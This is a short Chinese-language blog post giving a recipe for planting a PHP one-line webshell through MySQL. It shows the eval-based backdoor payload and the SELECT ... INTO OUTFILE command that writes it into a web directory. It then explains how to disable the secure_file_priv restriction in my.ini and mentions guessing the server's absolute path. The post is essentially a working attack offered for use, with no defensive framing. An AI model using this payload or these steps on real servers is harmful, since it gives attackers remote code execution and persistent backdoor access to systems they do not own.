利用mysql写入一句话木马
前提:
root权限,知道了服务器的web的绝对路径
select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D://WWW//22.php"
如果执行成功,生成D:/WWW/22.php,并写入
<?php @eval($_POST['pass']);?>
如果出现:
提示错误[Error Code] 1290 – The MySQL server is running with the –secure-file-priv option解决办法
是mysql设置的权限的问题
mysql对通过文件导入导出作了限制,默认不允许
show variables like '%secure%';
修改my.ini
secure_auth = ON
secure_file_priv = ""
注意:
1、绝对路径的猜解
2、INTO OUTFILE 后面的”D://WWW//22.php”(对反斜杠做了一次转义)
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/20368.html